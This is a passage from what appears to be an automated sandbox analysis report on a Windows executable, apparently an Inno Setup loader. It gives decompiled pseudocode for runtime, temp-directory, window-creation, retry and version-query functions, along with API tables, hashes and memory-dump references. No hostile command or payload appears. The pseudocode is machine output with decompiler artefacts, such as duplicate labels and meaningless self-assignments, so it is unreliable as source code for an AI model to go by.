							goto L13;
						}
						do {
							L13:
							E00405CE8(_t44);
							_t23 = E004054B4();
							_t44 = _t23;
						} while (_t23 != 0);
						goto L14;
					}
				} else {
					do {
						_t33 =  *0x4bb054; // 0x0
						 *0x4bb054 = 0;
						 *_t33();
					} while ( *0x4bb054 != 0);
					L8:
					while(1) {
					}
				}
			}










                                                            0x00407764
                                                            0x00407766
                                                            0x0040776b
                                                            0x00407772
                                                            0x00407772
                                                            0x0040777e
                                                            0x00407792
                                                            0x0040779c
                                                            0x0040779c
                                                            0x004077a5
                                                            0x004077c9
                                                            0x004077cd
                                                            0x004077d6
                                                            0x004077d6
                                                            0x004077dd
                                                            0x004077fc
                                                            0x004077fc
                                                            0x00407805
                                                            0x0040780c
                                                            0x00407811
                                                            0x00407813
                                                            0x00407818
                                                            0x0040781b
                                                            0x0040781b
                                                            0x0040781e
                                                            0x00407821
                                                            0x00407828
                                                            0x00407828
                                                            0x00407821
                                                            0x00407811
                                                            0x0040782f
                                                            0x00407838
                                                            0x0040783a
                                                            0x0040783a
                                                            0x00407841
                                                            0x00407845
                                                            0x00407845
                                                            0x0040784d
                                                            0x00407856
                                                            0x00407858
                                                            0x00407858
                                                            0x00407861
                                                            0x00407861
                                                            0x00407873
                                                            0x00407873
                                                            0x00407875
                                                            0x00407876
                                                            0x00000000
                                                            0x004077df
                                                            0x004077df
                                                            0x004077e4
                                                            0x004077e8
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004077ea
                                                            0x004077ea
                                                            0x004077ec
                                                            0x004077f1
                                                            0x004077f6
                                                            0x004077f8
                                                            0x00000000
                                                            0x004077ea
                                                            0x004077b0
                                                            0x004077b0
                                                            0x004077b0
                                                            0x004077b9
                                                            0x004077be
                                                            0x004077c0
                                                            0x00000000
                                                            0x004077c9
                                                            0x00000000
                                                            0x004077c9

                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00407780
                                                            • FreeLibrary.KERNEL32(00400000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407828
                                                            • ExitProcess.KERNEL32(00000000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407861
                                                              • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?,0040555F), ref: 004076F1
                                                              • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?), ref: 004076F7
                                                              • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?), ref: 00407712
                                                              • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?), ref: 00407718
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                            • String ID: MZP
                                                            • API String ID: 3490077880-2889622443
                                                            • Opcode ID: 1ba9ccdc5e5ec41ea7066db700fb32a50d39e50ecd0d58aa72eac7c5645d258d
                                                            • Instruction ID: 4bb8ca2865ae45d0ec72c9e6ca862cba493d08d50c1d65b63798a8296780cd14
                                                            • Opcode Fuzzy Hash: 1ba9ccdc5e5ec41ea7066db700fb32a50d39e50ecd0d58aa72eac7c5645d258d
                                                            • Instruction Fuzzy Hash: 76317220E087415BE721BB7A888875B76E09B45315F14897FE541A33D2D77CB884CB6F
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00407748, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86threadCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 86%
                                                            			E00407748() {
				intOrPtr* _t14;
				void* _t23;
				void* _t26;
				intOrPtr _t34;
				intOrPtr* _t36;
				void* _t50;
				struct HINSTANCE__* _t53;
				void* _t62;

				 *((intOrPtr*)(_t14 +  *_t14)) =  *((intOrPtr*)(_t14 +  *_t14)) + _t14 +  *_t14;
				if( *0x4b7004 != 0) {
					E00407630();
					E004076B8(_t50);
					 *0x4b7004 = 0;
				}
				if( *0x4bdbcc != 0 && GetCurrentThreadId() ==  *0x4bdbf4) {
					E00407388(0x4bdbc8);
					E0040768C(0x4bdbc8);
				}
				if( *0x004BDBC0 != 0 ||  *0x4bb054 == 0) {
					L9:
					if( *((char*)(0x4bdbc0)) == 2 &&  *0x4b7000 == 0) {
						 *0x004BDBA4 = 0;
					}
					if( *((char*)(0x4bdbc0)) != 0) {
						L15:
						E004073B0();
						if( *((char*)(0x4bdbc0)) <= 1 ||  *0x4b7000 != 0) {
							_t18 =  *0x004BDBA8;
							if( *0x004BDBA8 != 0) {
								E0040B40C(_t18);
								_t34 =  *((intOrPtr*)(0x4bdba8));
								_t8 = _t34 + 0x10; // 0x400000
								_t53 =  *_t8;
								_t9 = _t34 + 4; // 0x400000
								if(_t53 !=  *_t9 && _t53 != 0) {
									FreeLibrary(_t53);
								}
							}
						}
						E00407388(0x4bdb98);
						if( *((char*)(0x4bdbc0)) == 1) {
							 *0x004BDBBC();
						}
						if( *((char*)(0x4bdbc0)) != 0) {
							E0040768C(0x4bdb98);
						}
						if( *0x4bdb98 == 0) {
							if( *0x4bb038 != 0) {
								 *0x4bb038();
							}
							ExitProcess( *0x4b7000); // executed
						}
						memcpy(0x4bdb98,  *0x4bdb98, 0xc << 2);
						_t62 = _t62 + 0xc;
						0x4b7000 = 0x4b7000;
						0x4bdb98 = 0x4bdb98;
						goto L9;
					} else {
						_t23 = E004054B4();
						_t48 = _t23;
						if(_t23 == 0) {
							goto L15;
						} else {
							goto L14;
						}
						do {
							L14:
							E00405CE8(_t48);
							_t26 = E004054B4();
							_t48 = _t26;
						} while (_t26 != 0);
						goto L15;
					}
				} else {
					do {
						_t36 =  *0x4bb054; // 0x0
						 *0x4bb054 = 0;
						 *_t36();
					} while ( *0x4bb054 != 0);
					L9:
					while(1) {
					}
				}
			}











                                                            0x0040774a
                                                            0x00407764
                                                            0x00407766
                                                            0x0040776b
                                                            0x00407772
                                                            0x00407772
                                                            0x0040777e
                                                            0x00407792
                                                            0x0040779c
                                                            0x0040779c
                                                            0x004077a5
                                                            0x004077c9
                                                            0x004077cd
                                                            0x004077d6
                                                            0x004077d6
                                                            0x004077dd
                                                            0x004077fc
                                                            0x004077fc
                                                            0x00407805
                                                            0x0040780c
                                                            0x00407811
                                                            0x00407813
                                                            0x00407818
                                                            0x0040781b
                                                            0x0040781b
                                                            0x0040781e
                                                            0x00407821
                                                            0x00407828
                                                            0x00407828
                                                            0x00407821
                                                            0x00407811
                                                            0x0040782f
                                                            0x00407838
                                                            0x0040783a
                                                            0x0040783a
                                                            0x00407841
                                                            0x00407845
                                                            0x00407845
                                                            0x0040784d
                                                            0x00407856
                                                            0x00407858
                                                            0x00407858
                                                            0x00407861
                                                            0x00407861
                                                            0x00407873
                                                            0x00407873
                                                            0x00407875
                                                            0x00407876
                                                            0x00000000
                                                            0x004077df
                                                            0x004077df
                                                            0x004077e4
                                                            0x004077e8
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004077ea
                                                            0x004077ea
                                                            0x004077ec
                                                            0x004077f1
                                                            0x004077f6
                                                            0x004077f8
                                                            0x00000000
                                                            0x004077ea
                                                            0x004077b0
                                                            0x004077b0
                                                            0x004077b0
                                                            0x004077b9
                                                            0x004077be
                                                            0x004077c0
                                                            0x00000000
                                                            0x004077c9
                                                            0x00000000
                                                            0x004077c9

                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00407780
                                                            • FreeLibrary.KERNEL32(00400000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407828
                                                            • ExitProcess.KERNEL32(00000000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407861
                                                              • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?,0040555F), ref: 004076F1
                                                              • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?), ref: 004076F7
                                                              • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?), ref: 00407712
                                                              • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?), ref: 00407718
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                            • String ID: MZP
                                                            • API String ID: 3490077880-2889622443
                                                            • Opcode ID: 1e4888025ee955e8cc7e0f2d2f1a13e961f3985afae2446d4f356ca194078bac
                                                            • Instruction ID: bfc25cbdcfe625b544084418af651039c1e49876b6b13a82c314e6a817d38f33
                                                            • Opcode Fuzzy Hash: 1e4888025ee955e8cc7e0f2d2f1a13e961f3985afae2446d4f356ca194078bac
                                                            • Instruction Fuzzy Hash: E3314D20E087419BE721BB7A888935B7BA09B05315F14897FE541A73D2D77CB884CB6F
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004B5000, Relevance: 6.0, APIs: 4, Instructions: 43threadCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 79%
                                                            			E004B5000(void* __ecx, void* __edx) {
				intOrPtr _t19;
				intOrPtr _t22;

				_push(_t22);
				_push(0x4b50d7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t22;
				 *0x4bb98c =  *0x4bb98c - 1;
				if( *0x4bb98c < 0) {
					E00405B74();
					E004051A8();
					SetThreadLocale(0x400); // executed
					E0040A250();
					 *0x4b700c = 2;
					 *0x4bb01c = 0x4036b0;
					 *0x4bb020 = 0x4036b8;
					 *0x4bb05a = 2;
					 *0x4bb060 = E0040CAA4();
					 *0x4bb008 = 0x4095a0;
					E00405BCC(E00405BB0());
					 *0x4bb068 = 0xd7b0;
					 *0x4bb344 = 0xd7b0;
					 *0x4bb620 = 0xd7b0;
					 *0x4bb050 = GetCommandLineW();
					 *0x4bb04c = E00403810();
					 *0x4bb97c = GetACP();
					 *0x4bb980 = 0x4b0;
					 *0x4bb044 = GetCurrentThreadId();
					E0040CAB8();
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(0x4b50de);
				return 0;
			}





                                                            0x004b5005
                                                            0x004b5006
                                                            0x004b500b
                                                            0x004b500e
                                                            0x004b5011
                                                            0x004b5018
                                                            0x004b501e
                                                            0x004b5023
                                                            0x004b502d
                                                            0x004b5032
                                                            0x004b5037
                                                            0x004b503e
                                                            0x004b5048
                                                            0x004b5052
                                                            0x004b505e
                                                            0x004b5063
                                                            0x004b5072
                                                            0x004b5077
                                                            0x004b5080
                                                            0x004b5089
                                                            0x004b5097
                                                            0x004b50a1
                                                            0x004b50ab
                                                            0x004b50b0
                                                            0x004b50bf
                                                            0x004b50c4
                                                            0x004b50c4
                                                            0x004b50cb
                                                            0x004b50ce
                                                            0x004b50d1
                                                            0x004b50d6

                                                            APIs
                                                            • SetThreadLocale.KERNEL32(00000400,00000000,004B50D7), ref: 004B502D
                                                              • Part of subcall function 0040A250: InitializeCriticalSection.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A255
                                                              • Part of subcall function 0040A250: GetVersion.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A263
                                                              • Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A28A
                                                              • Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A290
                                                              • Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2A4
                                                              • Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2AA
                                                              • Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadUILanguage,00000000,kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2BE
                                                              • Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2C4
                                                              • Part of subcall function 0040CAA4: GetSystemInfo.KERNEL32 ref: 0040CAA8
                                                            • GetCommandLineW.KERNEL32(00000400,00000000,004B50D7), ref: 004B5092
                                                              • Part of subcall function 00403810: GetStartupInfoW.KERNEL32 ref: 00403821
                                                            • GetACP.KERNEL32(00000400,00000000,004B50D7), ref: 004B50A6
                                                            • GetCurrentThreadId.KERNEL32 ref: 004B50BA
                                                              • Part of subcall function 0040CAB8: GetVersion.KERNEL32(004B50C9,00000400,00000000,004B50D7), ref: 0040CAB8
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc$InfoThreadVersion$CommandCriticalCurrentInitializeLineLocaleSectionStartupSystem
                                                            • String ID:
                                                            • API String ID: 2740004594-0
                                                            • Opcode ID: aeeb1ef19c021384e5e919f33d2f1f63d534ea4b25bb20b8f726cabb6b9d9f22
                                                            • Instruction ID: 4c04e7183c3d5c6504f231a905193e891933426fc174ea8e71756e1f90614aff
                                                            • Opcode Fuzzy Hash: aeeb1ef19c021384e5e919f33d2f1f63d534ea4b25bb20b8f726cabb6b9d9f22
                                                            • Instruction Fuzzy Hash: 46111CB04047449FE311BF76A8062267BA8EB05309B508A7FE110662E2EBFD15048FEE
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004AEFE8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 73%
                                                            			E004AEFE8(void* __eax, long __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char* _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				int _t30;
				intOrPtr _t63;
				void* _t71;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t76;

				_t71 = __edi;
				_t54 = __ebx;
				_t75 = _t76;
				_t55 = 4;
				do {
					_push(0);
					_push(0);
					_t55 = _t55 - 1;
				} while (_t55 != 0);
				_push(_t55);
				_push(__ebx);
				_t73 = __eax;
				_t78 = 0;
				_push(_t75);
				_push(0x4af0e1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				while(1) {
					E00422D70( &_v12, _t54, _t55, _t78); // executed
					_t55 = L".tmp";
					E004AEEC8(0, _t54, L".tmp", _v12, _t71, _t73,  &_v8); // executed
					_t30 = CreateDirectoryW(E004084EC(_v8), 0); // executed
					if(_t30 != 0) {
						break;
					}
					_t54 = GetLastError();
					_t78 = _t54 - 0xb7;
					if(_t54 != 0xb7) {
						E00426F08(0x3d,  &_v32, _v8);
						_v28 = _v32;
						E00419E18( &_v36, _t54, 0);
						_v24 = _v36;
						E004232EC(_t54,  &_v40);
						_v20 = _v40;
						E00426ED8(0x81, 2,  &_v28,  &_v16);
						_t55 = _v16;
						E0041F264(_v16, 1);
						E0040711C();
					}
				}
				E00407E00(_t73, _v8);
				__eflags = 0;
				_pop(_t63);
				 *[fs:eax] = _t63;
				_push(E004AF0E8);
				E00407A80( &_v40, 3);
				return E00407A80( &_v16, 3);
			}


















                                                            0x004aefe8
                                                            0x004aefe8
                                                            0x004aefe9
                                                            0x004aefeb
                                                            0x004aeff0
                                                            0x004aeff0
                                                            0x004aeff2
                                                            0x004aeff4
                                                            0x004aeff4
                                                            0x004aeff7
                                                            0x004aeff8
                                                            0x004aeffa
                                                            0x004aeffc
                                                            0x004aeffe
                                                            0x004aefff
                                                            0x004af004
                                                            0x004af007
                                                            0x004af00a
                                                            0x004af011
                                                            0x004af019
                                                            0x004af020
                                                            0x004af030
                                                            0x004af037
                                                            0x00000000
                                                            0x00000000
                                                            0x004af03e
                                                            0x004af040
                                                            0x004af046
                                                            0x004af056
                                                            0x004af05e
                                                            0x004af06a
                                                            0x004af072
                                                            0x004af07a
                                                            0x004af082
                                                            0x004af091
                                                            0x004af096
                                                            0x004af0a0
                                                            0x004af0a5
                                                            0x004af0a5
                                                            0x004af046
                                                            0x004af0b4
                                                            0x004af0b9
                                                            0x004af0bb
                                                            0x004af0be
                                                            0x004af0c1
                                                            0x004af0ce
                                                            0x004af0e0

                                                            APIs
                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,004AF0E1,?,?,?,00000003,00000000,00000000,?,004B619F), ref: 004AF030
                                                            • GetLastError.KERNEL32(00000000,00000000,?,00000000,004AF0E1,?,?,?,00000003,00000000,00000000,?,004B619F), ref: 004AF039
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CreateDirectoryErrorLast
                                                            • String ID: .tmp
                                                            • API String ID: 1375471231-2986845003
                                                            • Opcode ID: b866ae3ac5566b90e4d091c6d0119bd5c5d6e6cd69059738e462e2ab807557f0
                                                            • Instruction ID: 89b964d67460c442e7c67535b057b8112791baa86db9a38931a927ffd746d2a8
                                                            • Opcode Fuzzy Hash: b866ae3ac5566b90e4d091c6d0119bd5c5d6e6cd69059738e462e2ab807557f0
                                                            • Instruction Fuzzy Hash: 3A218735A041089BDB00EBE1C842ADFB3B9EB49304F50447BF800F7381DA386E058BA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040E450, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E0040E450(long __eax, WCHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
				WCHAR* _v8;
				void* _t13;
				struct HWND__* _t24;
				WCHAR* _t29;
				long _t32;

				_v8 = _t29;
				_t32 = __eax;
				_t13 = E00405740();
				_t24 = CreateWindowExW(_t32, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				E00405730(_t13);
				return _t24;
			}








                                                            0x0040e457
                                                            0x0040e45c
                                                            0x0040e45e
                                                            0x0040e48f
                                                            0x0040e498
                                                            0x0040e4a4

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CreateWindow
                                                            • String ID: InnoSetupLdrWindow$STATIC
                                                            • API String ID: 716092398-2209255943
                                                            • Opcode ID: 4ba199ab3c1e041c72a50ebd66c3ee798d5f8225e8fee486b5eb3d70e3749009
                                                            • Instruction ID: 770f17d29583ffea265d4876c6cd55b491c436ce5e2cc0b006eebdc9bc405b2a
                                                            • Opcode Fuzzy Hash: 4ba199ab3c1e041c72a50ebd66c3ee798d5f8225e8fee486b5eb3d70e3749009
                                                            • Instruction Fuzzy Hash: 73F07FB6600118AF9B84DE9EDC85E9B77ECEB4D264B05412ABA08E7201D634ED118BA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004AF1B4, Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E004AF1B4(long __eax, intOrPtr __edx, long _a4, long _a8) {
				intOrPtr _v8;
				long _t5;
				long _t9;
				void* _t10;
				void* _t13;
				void* _t15;
				void* _t16;

				_t5 = __eax;
				_v8 = __edx;
				_t9 = __eax;
				_t15 = _t10 - 1;
				if(_t15 < 0) {
					L10:
					return _t5;
				}
				_t16 = _t15 + 1;
				_t13 = 0;
				while(1) {
					_t19 = _t13 - 1;
					if(_t13 != 1) {
						__eflags = _t13 - 1;
						if(__eflags > 0) {
							Sleep(_a4);
						}
					} else {
						Sleep(_a8);
					}
					_t5 = E00427154(_t9, _v8, _t19); // executed
					if(_t5 != 0) {
						goto L10;
					}
					_t5 = GetLastError();
					if(_t5 == 2) {
						goto L10;
					}
					_t5 = GetLastError();
					if(_t5 == 3) {
						goto L10;
					}
					_t13 = _t13 + 1;
					_t16 = _t16 - 1;
					if(_t16 != 0) {
						continue;
					}
					goto L10;
				}
				goto L10;
			}










                                                            0x004af1b4
                                                            0x004af1bb
                                                            0x004af1be
                                                            0x004af1c2
                                                            0x004af1c5
                                                            0x004af213
                                                            0x004af213
                                                            0x004af213
                                                            0x004af1c7
                                                            0x004af1c8
                                                            0x004af1ca
                                                            0x004af1ca
                                                            0x004af1cd
                                                            0x004af1da
                                                            0x004af1dd
                                                            0x004af1e3
                                                            0x004af1e3
                                                            0x004af1cf
                                                            0x004af1d3
                                                            0x004af1d3
                                                            0x004af1ed
                                                            0x004af1f4
                                                            0x00000000
                                                            0x00000000
                                                            0x004af1f6
                                                            0x004af1fe
                                                            0x00000000
                                                            0x00000000
                                                            0x004af200
                                                            0x004af208
                                                            0x00000000
                                                            0x00000000
                                                            0x004af20a
                                                            0x004af20b
                                                            0x004af20c
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004af20c
                                                            0x00000000

                                                            APIs
                                                            • Sleep.KERNEL32(?,?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1D3
                                                            • Sleep.KERNEL32(?,?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1E3
                                                            • GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1F6
                                                            • GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF200
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ErrorLastSleep
                                                            • String ID:
                                                            • API String ID: 1458359878-0
                                                            • Opcode ID: 132a67e1d44d9774a6928004e5d8cee8820d44842addde93f31c36794548402b
                                                            • Instruction ID: c6a2870ed3ca6a3ef6dac7de38143878fdab2d33d6efdb0808b7300bb595a527
                                                            • Opcode Fuzzy Hash: 132a67e1d44d9774a6928004e5d8cee8820d44842addde93f31c36794548402b
                                                            • Instruction Fuzzy Hash: 0CF02B37B04224A76724A5EBEC46D6FE298DEB33A8710457BFC04D7302C439CC4542A8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041FF94, Relevance: 4.6, APIs: 3, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 63%
                                                            			E0041FF94(void* __eax, void* __ebx, signed int* __ecx, signed int* __edx, void* __edi, void* __esi, signed int* _a4) {
				char _v8;
				char _v9;
				int _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _t33;
				int _t43;
				int _t64;
				intOrPtr _t72;
				intOrPtr _t74;
				signed int* _t77;
				signed int* _t79;
				void* _t81;
				void* _t82;
				intOrPtr _t83;

				_t81 = _t82;
				_t83 = _t82 + 0xffffffe8;
				_v8 = 0;
				_t77 = __ecx;
				_t79 = __edx;
				_push(_t81);
				_push(0x420094);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83;
				_v9 = 0;
				E00407E48( &_v8, __eax);
				E00407FB0( &_v8);
				_t33 = GetFileVersionInfoSizeW(E004084EC(_v8),  &_v16); // executed
				_t64 = _t33;
				if(_t64 == 0) {
					_pop(_t72);
					 *[fs:eax] = _t72;
					_push(0x42009b);
					return E00407A20( &_v8);
				} else {
					_v20 = E004053F0(_t64);
					_push(_t81);
					_push(0x420077);
					_push( *[fs:edx]);
					 *[fs:edx] = _t83;
					_t43 = GetFileVersionInfoW(E004084EC(_v8), _v16, _t64, _v20); // executed
					if(_t43 != 0 && VerQueryValueW(_v20, 0x4200a8,  &_v24,  &_v28) != 0) {
						 *_t79 =  *(_v24 + 0x10) >> 0x00000010 & 0x0000ffff;
						 *_t77 =  *(_v24 + 0x10) & 0x0000ffff;
						 *_a4 =  *(_v24 + 0x14) >> 0x00000010 & 0x0000ffff;
						_v9 = 1;
					}
					_pop(_t74);
					 *[fs:eax] = _t74;
					_push(0x42007e);
					return E0040540C(_v20);
				}
			}



















                                                            0x0041ff95
                                                            0x0041ff97
                                                            0x0041ff9f
                                                            0x0041ffa2
                                                            0x0041ffa4
                                                            0x0041ffaa
                                                            0x0041ffab
                                                            0x0041ffb0
                                                            0x0041ffb3
                                                            0x0041ffb6
                                                            0x0041ffbf
                                                            0x0041ffc7
                                                            0x0041ffd9
                                                            0x0041ffde
                                                            0x0041ffe2
                                                            0x00420080
                                                            0x00420083
                                                            0x00420086
                                                            0x00420093
                                                            0x0041ffe8
                                                            0x0041ffef
                                                            0x0041fff4
                                                            0x0041fff5
                                                            0x0041fffa
                                                            0x0041fffd
                                                            0x00420012
                                                            0x00420019
                                                            0x00420041
                                                            0x0042004a
                                                            0x0042005b
                                                            0x0042005d
                                                            0x0042005d
                                                            0x00420063
                                                            0x00420066
                                                            0x00420069
                                                            0x00420076
                                                            0x00420076

                                                            APIs
                                                            • GetFileVersionInfoSizeW.VERSION(00000000,?,00000000,00420094), ref: 0041FFD9
                                                            • GetFileVersionInfoW.VERSION(00000000,?,00000000,?,00000000,00420077,?,00000000,?,00000000,00420094), ref: 00420012
                                                            • VerQueryValueW.VERSION(?,004200A8,?,?,00000000,?,00000000,?,00000000,00420077,?,00000000,?,00000000,00420094), ref: 0042002C
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
